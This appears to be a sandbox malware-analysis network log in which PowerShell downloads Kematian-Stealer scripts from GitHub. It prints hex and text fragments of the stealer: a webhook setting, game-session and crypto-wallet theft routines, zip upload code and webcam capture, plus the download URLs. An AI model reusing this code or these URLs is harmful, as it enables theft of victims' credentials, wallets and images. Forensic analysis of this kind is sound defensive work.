                                        Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 55 53 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 59 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 7a 69 70 22 3a 22 31 30 31 32 33 22 2c 22 6c 61 74 22 3a 34 30 2e 37 31 32 38 2c 22 6c 6f 6e 22 3a 2d 37 34 2e 30 30 36 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 69 73 70 22 3a 22 4c 65 76 65 6c 20 33 22 2c 22 6f 72 67 22 3a 22 43 65 6e 74 75 72 79 4c 69 6e 6b 20 43 6f 6d 6d 75 6e 69 63 61 74 69 6f 6e 73 2c 20 4c 4c 43 22 2c 22 61 73 22 3a 22 41 53 33 33 35 36 20 4c 65 76 65 6c 20 33 20 50 61 72 65 6e 74 2c 20 4c 4c 43 22 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 7d
                                        Data Ascii: {"status":"success","country":"United States","countryCode":"US","region":"NY","regionName":"New York","city":"New York","zip":"10123","lat":40.7128,"lon":-74.006,"timezone":"America/New_York","isp":"Level 3","org":"CenturyLink Communications, LLC","as":"AS3356 Level 3 Parent, LLC","query":"8.46.123.33"}


                                        HTTPS Proxied Packets

                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        0192.168.2.449730185.199.110.1334437536C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        TimestampBytes transferredDirectionData
                                        2024-07-05 04:26:07 UTC230OUTGET /ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps1 HTTP/1.1
                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                        Host: raw.githubusercontent.com
                                        Connection: Keep-Alive
                                        2024-07-05 04:26:07 UTC893INHTTP/1.1 200 OK
                                        Connection: close
                                        Content-Length: 75911
                                        Cache-Control: max-age=300
                                        Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                        Content-Type: text/plain; charset=utf-8
                                        ETag: "c0278b7cb7b50b58213bb8cf7baf3a7f2144a36b998d21c5d245aa61879a1fb0"
                                        Strict-Transport-Security: max-age=31536000
                                        X-Content-Type-Options: nosniff
                                        X-Frame-Options: deny
                                        X-XSS-Protection: 1; mode=block
                                        X-GitHub-Request-Id: EA27:EE41A:5ADD6C:638BFC:668775DC
                                        Accept-Ranges: bytes
                                        Date: Fri, 05 Jul 2024 04:26:07 GMT
                                        Via: 1.1 varnish
                                        X-Served-By: cache-ewr18154-EWR
                                        X-Cache: MISS
                                        X-Cache-Hits: 0
                                        X-Timer: S1720153567.105837,VS0,VE47
                                        Vary: Authorization,Accept-Encoding,Origin
                                        Access-Control-Allow-Origin: *
                                        Cross-Origin-Resource-Policy: cross-origin
                                        X-Fastly-Request-ID: c3a47e8446114e5eb670ff869da31e4655abb150
                                        Expires: Fri, 05 Jul 2024 04:31:07 GMT
                                        Source-Age: 0
                                        2024-07-05 04:26:07 UTC16384INData Raw: 23 24 77 65 62 68 6f 6f 6b 20 3d 20 22 59 4f 55 52 5f 55 52 4c 5f 48 45 52 45 5f 53 45 52 56 45 52 22 20 0d 0a 23 24 64 65 62 75 67 20 3d 20 24 66 61 6c 73 65 0d 0a 23 24 62 6c 6f 63 6b 68 6f 73 74 73 66 69 6c 65 20 3d 20 24 66 61 6c 73 65 0d 0a 23 24 63 72 69 74 69 63 61 6c 70 72 6f 63 65 73 73 20 3d 20 24 66 61 6c 73 65 0d 0a 23 24 6d 65 6c 74 20 3d 20 24 66 61 6c 73 65 0d 0a 23 24 66 61 6b 65 65 72 72 6f 72 20 3d 20 24 66 61 6c 73 65 0d 0a 23 24 70 65 72 73 69 73 74 65 6e 63 65 20 3d 20 24 66 61 6c 73 65 0d 0a 23 24 77 72 69 74 65 5f 64 69 73 6b 5f 6f 6e 6c 79 20 3d 20 24 66 61 6c 73 65 0d 0a 23 24 76 6d 5f 70 72 6f 74 65 63 74 20 3d 20 24 66 61 6c 73 65 0d 0a 23 24 65 6e 63 72 79 70 74 69 6f 6e 5f 6b 65 79 20 3d 20 22 59 4f 55 52 5f 45 4e 43 5f 4b 45
                                        Data Ascii: #$webhook = "YOUR_URL_HERE_SERVER" #$debug = $false#$blockhostsfile = $false#$criticalprocess = $false#$melt = $false#$fakeerror = $false#$persistence = $false#$write_disk_only = $false#$vm_protect = $false#$encryption_key = "YOUR_ENC_KE
                                        2024-07-05 04:26:07 UTC16384INData Raw: 72 6f 73 6f 66 74 5c 57 69 6e 64 6f 77 73 5c 43 75 72 72 65 6e 74 56 65 72 73 69 6f 6e 5c 55 6e 69 6e 73 74 61 6c 6c 5c 2a 22 20 7c 0d 0a 20 20 20 20 57 68 65 72 65 2d 4f 62 6a 65 63 74 20 7b 20 24 5f 2e 44 69 73 70 6c 61 79 4e 61 6d 65 20 2d 6e 65 20 24 6e 75 6c 6c 20 2d 61 6e 64 20 24 5f 2e 44 69 73 70 6c 61 79 56 65 72 73 69 6f 6e 20 2d 6e 65 20 24 6e 75 6c 6c 20 7d 20 7c 0d 0a 20 20 20 20 53 65 6c 65 63 74 2d 4f 62 6a 65 63 74 20 44 69 73 70 6c 61 79 4e 61 6d 65 2c 20 44 69 73 70 6c 61 79 56 65 72 73 69 6f 6e 2c 20 50 75 62 6c 69 73 68 65 72 2c 20 49 6e 73 74 61 6c 6c 44 61 74 65 20 7c 0d 0a 20 20 20 20 46 6f 72 6d 61 74 2d 54 61 62 6c 65 20 2d 57 72 61 70 20 2d 41 75 74 6f 53 69 7a 65 20 7c 0d 0a 20 20 20 20 4f 75 74 2d 53 74 72 69 6e 67 0d 0a 0d 0a
                                        Data Ascii: rosoft\Windows\CurrentVersion\Uninstall\*" | Where-Object { $_.DisplayName -ne $null -and $_.DisplayVersion -ne $null } | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Format-Table -Wrap -AutoSize | Out-String
                                        2024-07-05 04:26:07 UTC16384INData Raw: 73 5f 73 65 73 73 69 6f 6e 20 2d 52 65 63 75 72 73 65 20 2d 66 6f 72 63 65 0d 0a 20 20 20 20 20 20 20 20 43 6f 70 79 2d 49 74 65 6d 20 2d 50 61 74 68 20 22 24 65 70 69 63 67 61 6d 65 73 66 6f 6c 64 65 72 5c 53 61 76 65 64 5c 44 61 74 61 22 20 2d 44 65 73 74 69 6e 61 74 69 6f 6e 20 24 65 70 69 63 67 61 6d 65 73 5f 73 65 73 73 69 6f 6e 20 2d 52 65 63 75 72 73 65 20 2d 66 6f 72 63 65 0d 0a 20 20 20 20 7d 0d 0a 20 20 20 20 65 70 69 63 67 61 6d 65 73 5f 73 74 65 61 6c 65 72 0d 0a 0d 0a 20 20 20 20 23 20 55 62 69 73 6f 66 74 20 0d 0a 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 75 62 69 73 6f 66 74 73 74 65 61 6c 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 24 75 62 69 73 6f 66 74 66 6f 6c 64 65 72 20 3d 20 22 24 65 6e 76 3a 6c 6f 63 61 6c 61 70 70 64 61 74 61 5c 55 62
                                        Data Ascii: s_session -Recurse -force Copy-Item -Path "$epicgamesfolder\Saved\Data" -Destination $epicgames_session -Recurse -force } epicgames_stealer # Ubisoft function ubisoftstealer { $ubisoftfolder = "$env:localappdata\Ub
                                        2024-07-05 04:26:07 UTC16384INData Raw: 20 20 22 42 69 74 63 6f 69 6e 22 20 20 20 20 20 20 20 20 20 20 3d 20 4a 6f 69 6e 2d 50 61 74 68 20 24 65 6e 76 3a 61 70 70 64 61 74 61 20 20 20 20 20 20 22 5c 42 69 74 63 6f 69 6e 5c 77 61 6c 6c 65 74 73 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 42 79 74 65 63 6f 69 6e 22 20 20 20 20 20 20 20 20 20 3d 20 4a 6f 69 6e 2d 50 61 74 68 20 24 65 6e 76 3a 61 70 70 64 61 74 61 20 20 20 20 20 20 22 5c 62 79 74 65 63 6f 69 6e 5c 2a 2e 77 61 6c 6c 65 74 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 43 6f 69 6e 6f 6d 69 22 20 20 20 20 20 20 20 20 20 20 3d 20 4a 6f 69 6e 2d 50 61 74 68 20 24 65 6e 76 3a 6c 6f 63 61 6c 61 70 70 64 61 74 61 20 22 43 6f 69 6e 6f 6d 69 5c 43 6f 69 6e 6f 6d 69 5c 77 61 6c 6c 65 74 73 22 0d 0a 20 20 20 20 20
                                        Data Ascii: "Bitcoin" = Join-Path $env:appdata "\Bitcoin\wallets" "Bytecoin" = Join-Path $env:appdata "\bytecoin\*.wallet" "Coinomi" = Join-Path $env:localappdata "Coinomi\Coinomi\wallets"
                                        2024-07-05 04:26:07 UTC10375INData Raw: 72 74 43 6f 6e 74 65 6e 74 20 3d 20 5b 4e 65 74 2e 48 74 74 70 2e 4d 75 6c 74 69 70 61 72 74 46 6f 72 6d 44 61 74 61 43 6f 6e 74 65 6e 74 5d 3a 3a 6e 65 77 28 29 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 66 69 6c 65 53 74 72 65 61 6d 20 3d 20 5b 49 4f 2e 46 69 6c 65 5d 3a 3a 4f 70 65 6e 52 65 61 64 28 24 7a 69 70 46 69 6c 65 50 61 74 68 29 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 66 69 6c 65 43 6f 6e 74 65 6e 74 20 3d 20 5b 4e 65 74 2e 48 74 74 70 2e 53 74 72 65 61 6d 43 6f 6e 74 65 6e 74 5d 3a 3a 6e 65 77 28 24 66 69 6c 65 53 74 72 65 61 6d 29 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 66 69 6c 65 43 6f 6e 74 65 6e 74 2e 48 65 61 64 65 72 73 2e 43 6f 6e 74 65 6e 74 54 79 70 65 20 3d 20 5b 4e 65 74 2e 48 74 74
                                        Data Ascii: rtContent = [Net.Http.MultipartFormDataContent]::new() $fileStream = [IO.File]::OpenRead($zipFilePath) $fileContent = [Net.Http.StreamContent]::new($fileStream) $fileContent.Headers.ContentType = [Net.Htt


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        1192.168.2.449737104.16.123.964437296C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        TimestampBytes transferredDirectionData
                                        2024-07-05 04:26:30 UTC176OUTGET /cdn-cgi/trace HTTP/1.1
                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                        Host: www.cloudflare.com
                                        Connection: Keep-Alive
                                        2024-07-05 04:26:30 UTC332INHTTP/1.1 200 OK
                                        Date: Fri, 05 Jul 2024 04:26:30 GMT
                                        Content-Type: text/plain
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Access-Control-Allow-Origin: *
                                        Server: cloudflare
                                        CF-RAY: 89e498e2da815e72-EWR
                                        X-Frame-Options: DENY
                                        X-Content-Type-Options: nosniff
                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                        Cache-Control: no-cache
                                        2024-07-05 04:26:30 UTC285INData Raw: 31 31 36 0d 0a 66 6c 3d 36 34 39 66 32 33 37 0a 68 3d 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 0a 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33 0a 74 73 3d 31 37 32 30 31 35 33 35 39 30 2e 32 31 33 0a 76 69 73 69 74 5f 73 63 68 65 6d 65 3d 68 74 74 70 73 0a 75 61 67 3d 4d 6f 7a 69 6c 6c 61 2f 35 2e 30 20 28 57 69 6e 64 6f 77 73 20 4e 54 3b 20 57 69 6e 64 6f 77 73 20 4e 54 20 31 30 2e 30 3b 20 65 6e 2d 55 53 29 20 57 69 6e 64 6f 77 73 50 6f 77 65 72 53 68 65 6c 6c 2f 35 2e 31 2e 31 39 30 34 31 2e 31 36 38 32 0a 63 6f 6c 6f 3d 45 57 52 0a 73 6c 69 76 65 72 3d 6e 6f 6e 65 0a 68 74 74 70 3d 68 74 74 70 2f 31 2e 31 0a 6c 6f 63 3d 55 53 0a 74 6c 73 3d 54 4c 53 76 31 2e 33 0a 73 6e 69 3d 70 6c 61 69 6e 74 65 78 74 0a 77 61 72 70 3d 6f 66 66 0a 67 61 74
                                        Data Ascii: 116fl=649f237h=www.cloudflare.comip=8.46.123.33ts=1720153590.213visit_scheme=httpsuag=Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682colo=EWRsliver=nonehttp=http/1.1loc=UStls=TLSv1.3sni=plaintextwarp=offgat
                                        2024-07-05 04:26:30 UTC5INData Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        2192.168.2.463770104.16.123.964437296C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        TimestampBytes transferredDirectionData
                                        2024-07-05 04:26:30 UTC152OUTGET /cdn-cgi/trace HTTP/1.1
                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                        Host: www.cloudflare.com
                                        2024-07-05 04:26:30 UTC332INHTTP/1.1 200 OK
                                        Date: Fri, 05 Jul 2024 04:26:30 GMT
                                        Content-Type: text/plain
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Access-Control-Allow-Origin: *
                                        Server: cloudflare
                                        CF-RAY: 89e498e6fbb8432c-EWR
                                        X-Frame-Options: DENY
                                        X-Content-Type-Options: nosniff
                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                        Cache-Control: no-cache
                                        2024-07-05 04:26:30 UTC284INData Raw: 31 31 35 0d 0a 66 6c 3d 36 34 39 66 34 32 0a 68 3d 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 0a 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33 0a 74 73 3d 31 37 32 30 31 35 33 35 39 30 2e 38 37 36 0a 76 69 73 69 74 5f 73 63 68 65 6d 65 3d 68 74 74 70 73 0a 75 61 67 3d 4d 6f 7a 69 6c 6c 61 2f 35 2e 30 20 28 57 69 6e 64 6f 77 73 20 4e 54 3b 20 57 69 6e 64 6f 77 73 20 4e 54 20 31 30 2e 30 3b 20 65 6e 2d 55 53 29 20 57 69 6e 64 6f 77 73 50 6f 77 65 72 53 68 65 6c 6c 2f 35 2e 31 2e 31 39 30 34 31 2e 31 36 38 32 0a 63 6f 6c 6f 3d 45 57 52 0a 73 6c 69 76 65 72 3d 6e 6f 6e 65 0a 68 74 74 70 3d 68 74 74 70 2f 31 2e 31 0a 6c 6f 63 3d 55 53 0a 74 6c 73 3d 54 4c 53 76 31 2e 33 0a 73 6e 69 3d 70 6c 61 69 6e 74 65 78 74 0a 77 61 72 70 3d 6f 66 66 0a 67 61 74 65
                                        Data Ascii: 115fl=649f42h=www.cloudflare.comip=8.46.123.33ts=1720153590.876visit_scheme=httpsuag=Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682colo=EWRsliver=nonehttp=http/1.1loc=UStls=TLSv1.3sni=plaintextwarp=offgate
                                        2024-07-05 04:26:30 UTC5INData Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        3192.168.2.463775140.82.121.34437624C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        TimestampBytes transferredDirectionData
                                        2024-07-05 04:26:38 UTC121OUTGET /Somali-Devs/Kematian-Stealer/raw/main/frontend-src/webcam.ps1 HTTP/1.1
                                        Host: github.com
                                        Connection: Keep-Alive
                                        2024-07-05 04:26:38 UTC572INHTTP/1.1 302 Found
                                        Server: GitHub.com
                                        Date: Fri, 05 Jul 2024 04:26:38 GMT
                                        Content-Type: text/html; charset=utf-8
                                        Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                        Access-Control-Allow-Origin:
                                        Location: https://raw.githubusercontent.com/Somali-Devs/Kematian-Stealer/main/frontend-src/webcam.ps1
                                        Cache-Control: no-cache
                                        Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                        X-Frame-Options: deny
                                        X-Content-Type-Options: nosniff
                                        X-XSS-Protection: 0
                                        Referrer-Policy: no-referrer-when-downgrade
                                        2024-07-05 04:26:38 UTC3031INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f 6d 20 72 61 77 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 61 70 69 2e 67 69 74 68 75 62 2e
                                        Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        4192.168.2.463776185.199.110.1334437624C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        TimestampBytes transferredDirectionData
                                        2024-07-05 04:26:39 UTC132OUTGET /Somali-Devs/Kematian-Stealer/main/frontend-src/webcam.ps1 HTTP/1.1
                                        Host: raw.githubusercontent.com
                                        Connection: Keep-Alive
                                        2024-07-05 04:26:39 UTC899INHTTP/1.1 200 OK
                                        Connection: close
                                        Content-Length: 6453
                                        Cache-Control: max-age=300
                                        Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                        Content-Type: text/plain; charset=utf-8
                                        ETag: "b50d2c1034106e88552448ec70d0c1c0b89ade259fb54cca4421fb16c45cbe01"
                                        Strict-Transport-Security: max-age=31536000
                                        X-Content-Type-Options: nosniff
                                        X-Frame-Options: deny
                                        X-XSS-Protection: 1; mode=block
                                        X-GitHub-Request-Id: 706D:2F21E:1D98C2:2153BB:668775FC
                                        Accept-Ranges: bytes
                                        Date: Fri, 05 Jul 2024 04:26:39 GMT
                                        Via: 1.1 varnish
                                        X-Served-By: cache-nyc-kteb1890099-NYC
                                        X-Cache: MISS
                                        X-Cache-Hits: 0
                                        X-Timer: S1720153599.485511,VS0,VE46
                                        Vary: Authorization,Accept-Encoding,Origin
                                        Access-Control-Allow-Origin: *
                                        Cross-Origin-Resource-Policy: cross-origin
                                        X-Fastly-Request-ID: 25104983a3530a3481da6464c65fc68558a3f8ea
                                        Expires: Fri, 05 Jul 2024 04:31:39 GMT
                                        Source-Age: 0
                                        2024-07-05 04:26:39 UTC1378INData Raw: 66 75 6e 63 74 69 6f 6e 20 47 65 74 2d 57 65 62 43 61 6d 49 6d 61 67 65 20 7b 0a 20 20 20 20 23 20 6d 61 64 65 20 62 79 20 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 73 74 65 66 61 6e 73 74 72 61 6e 67 65 72 2f 50 6f 77 65 72 53 68 65 6c 6c 2f 62 6c 6f 62 2f 6d 61 73 74 65 72 2f 47 65 74 2d 57 65 62 43 61 6d 70 2e 70 73 31 0a 20 20 20 20 24 73 6f 75 72 63 65 20 3d 20 40 22 20 0a 20 20 20 20 75 73 69 6e 67 20 53 79 73 74 65 6d 3b 20 0a 20 20 20 20 75 73 69 6e 67 20 53 79 73 74 65 6d 2e 43 6f 6c 6c 65 63 74 69 6f 6e 73 2e 47 65 6e 65 72 69 63 3b 20 0a 20 20 20 20 75 73 69 6e 67 20 53 79 73 74 65 6d 2e 54 65 78 74 3b 20 0a 20 20 20 20 75 73 69 6e 67 20 53 79 73 74 65 6d 2e 43 6f 6c 6c 65 63 74 69 6f 6e 73 3b 20 0a 20 20 20 20 75 73 69 6e 67 20
                                        Data Ascii: function Get-WebCamImage { # made by https://github.com/stefanstranger/PowerShell/blob/master/Get-WebCamp.ps1 $source = @" using System; using System.Collections.Generic; using System.Text; using System.Collections; using
                                        2024-07-05 04:26:39 UTC1378INData Raw: 50 6f 69 6e 74 20 3d 20 22 53 65 6e 64 4d 65 73 73 61 67 65 41 22 29 5d 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 72 6f 74 65 63 74 65 64 20 73 74 61 74 69 63 20 65 78 74 65 72 6e 20 69 6e 74 20 53 65 6e 64 4d 65 73 73 61 67 65 28 69 6e 74 20 68 77 6e 64 2c 20 69 6e 74 20 77 4d 73 67 2c 20 69 6e 74 20 77 50 61 72 61 6d 2c 20 5b 4d 61 72 73 68 61 6c 41 73 28 55 6e 6d 61 6e 61 67 65 64 54 79 70 65 2e 41 73 41 6e 79 29 5d 20 6f 62 6a 65 63 74 20 6c 50 61 72 61 6d 29 3b 20 0a 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 5b 44 6c 6c 49 6d 70 6f 72 74 28 22 75 73 65 72 33 32 22 29 5d 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 72 6f 74 65 63 74 65 64 20 73 74 61 74 69 63 20 65 78 74 65 72 6e 20 69 6e 74 20 53 65 74 57 69 6e 64 6f 77 50 6f 73 28 69 6e
                                        Data Ascii: Point = "SendMessageA")] protected static extern int SendMessage(int hwnd, int wMsg, int wParam, [MarshalAs(UnmanagedType.AsAny)] object lParam); [DllImport("user32")] protected static extern int SetWindowPos(in
                                        2024-07-05 04:26:39 UTC1378INData Raw: 4c 44 2c 20 30 2c 20 30 2c 20 77 69 6e 64 6f 77 57 69 64 74 68 2c 20 77 69 6e 64 6f 77 48 65 69 67 68 74 2c 20 68 61 6e 64 6c 65 2c 20 30 29 3b 20 0a 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 53 65 6e 64 4d 65 73 73 61 67 65 28 64 65 76 69 63 65 48 61 6e 64 6c 65 2c 20 57 4d 5f 43 41 50 5f 44 52 49 56 45 52 5f 43 4f 4e 4e 45 43 54 2c 20 74 68 69 73 2e 69 6e 64 65 78 2c 20 30 29 20 3e 20 30 29 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 53 65 6e 64 4d 65 73 73 61 67 65 28 64 65 76 69 63 65 48 61 6e 64 6c 65 2c 20 57 4d 5f 43 41 50 5f 53 45 54 5f 53 43 41 4c 45 2c 20 2d 31 2c 20 30 29 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                        Data Ascii: LD, 0, 0, windowWidth, windowHeight, handle, 0); if (SendMessage(deviceHandle, WM_CAP_DRIVER_CONNECT, this.index, 0) > 0) { SendMessage(deviceHandle, WM_CAP_SET_SCALE, -1, 0);
                                        2024-07-05 04:26:39 UTC1378INData Raw: 20 6c 70 73 7a 4e 61 6d 65 2c 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 6e 74 20 63 62 4e 61 6d 65 2c 20 5b 4d 61 72 73 68 61 6c 41 73 28 55 6e 6d 61 6e 61 67 65 64 54 79 70 65 2e 56 42 42 79 52 65 66 53 74 72 29 5d 20 72 65 66 20 53 74 72 69 6e 67 20 6c 70 73 7a 56 65 72 2c 20 69 6e 74 20 63 62 56 65 72 29 3b 20 0a 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 73 74 61 74 69 63 20 41 72 72 61 79 4c 69 73 74 20 64 65 76 69 63 65 73 20 3d 20 6e 65 77 20 41 72 72 61 79 4c 69 73 74 28 29 3b 20 0a 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 75 62 6c 69 63 20 73 74 61 74 69 63 20 44 65 76 69 63 65 5b 5d 20 47 65 74 41 6c 6c 44 65 76 69 63 65 73 28 29 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                        Data Ascii: lpszName, int cbName, [MarshalAs(UnmanagedType.VBByRefStr)] ref String lpszVer, int cbVer); static ArrayList devices = new ArrayList(); public static Device[] GetAllDevices() {
                                        2024-07-05 04:26:39 UTC941INData Raw: 62 6c 79 5d 3a 3a 6c 6f 61 64 77 69 74 68 70 61 72 74 69 61 6c 6e 61 6d 65 28 22 53 79 73 74 65 6d 2e 57 69 6e 64 6f 77 73 2e 46 6f 72 6d 73 22 29 20 7c 20 4f 75 74 2d 4e 75 6c 6c 20 0a 20 20 20 20 20 20 20 20 5b 72 65 66 6c 65 63 74 69 6f 6e 2e 61 73 73 65 6d 62 6c 79 5d 3a 3a 6c 6f 61 64 77 69 74 68 70 61 72 74 69 61 6c 6e 61 6d 65 28 22 53 79 73 74 65 6d 2e 44 72 61 77 69 6e 67 22 29 20 7c 20 4f 75 74 2d 4e 75 6c 6c 20 0a 20 20 20 20 20 20 20 20 24 70 69 63 43 61 70 74 75 72 65 20 3d 20 4e 65 77 2d 4f 62 6a 65 63 74 20 53 79 73 74 65 6d 2e 57 69 6e 64 6f 77 73 2e 46 6f 72 6d 73 2e 50 69 63 74 75 72 65 42 6f 78 20 0a 20 20 20 20 20 20 20 20 74 72 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 64 65 76 69 63 65 73 20 3d 20 5b 57 65 62 43 61 6d 4c 69
                                        Data Ascii: bly]::loadwithpartialname("System.Windows.Forms") | Out-Null [reflection.assembly]::loadwithpartialname("System.Drawing") | Out-Null $picCapture = New-Object System.Windows.Forms.PictureBox try { $devices = [WebCamLi


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        5192.168.2.463777140.82.121.34433852C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        TimestampBytes transferredDirectionData
                                        2024-07-05 04:26:54 UTC133OUTGET /Somali-Devs/Kematian-Stealer/raw/main/frontend-src/kematian_shellcode.ps1 HTTP/1.1
                                        Host: github.com
                                        Connection: Keep-Alive
                                        2024-07-05 04:26:55 UTC584INHTTP/1.1 302 Found
                                        Server: GitHub.com
                                        Date: Fri, 05 Jul 2024 04:26:55 GMT
                                        Content-Type: text/html; charset=utf-8
                                        Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                        Access-Control-Allow-Origin:
                                        Location: https://raw.githubusercontent.com/Somali-Devs/Kematian-Stealer/main/frontend-src/kematian_shellcode.ps1
                                        Cache-Control: no-cache
                                        Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                        X-Frame-Options: deny
                                        X-Content-Type-Options: nosniff
                                        X-XSS-Protection: 0
                                        Referrer-Policy: no-referrer-when-downgrade
                                        2024-07-05 04:26:55 UTC3030INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f 6d 20 72 61 77 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 61 70 69 2e 67 69 74 68 75 62 2e
                                        Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        6192.168.2.463778185.199.110.1334433852C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
